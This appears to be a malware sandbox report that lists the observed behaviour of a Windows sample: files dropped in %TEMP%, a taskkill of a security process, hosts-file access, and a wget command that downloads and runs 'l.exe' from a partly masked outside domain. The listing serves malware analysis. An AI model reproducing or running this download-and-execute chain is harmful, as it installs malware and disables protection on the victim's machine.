Technical Information
- '' (downloaded from the Internet)
- '<SYSTEM32>\taskkill.exe' /im "praetorian.exe"
- %TEMP%\install.cmd
- %TEMP%\wget.exe
- %TEMP%\l.exe
- <DRIVERS>\etc\hosts
- 'av####aly1974.co.vu':80
- http://av####aly1974.co.vu/l.exe
- DNS ASK av####aly1974.co.vu
- ClassName: '' WindowName: ''
- '%TEMP%\wget.exe' http://av####aly1974.co.vu/l.exe
- '%TEMP%\l.exe'
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\install.cmd" "
- '<SYSTEM32>\tasklist.exe'
- '<SYSTEM32>\find.exe' /i "wget.exe"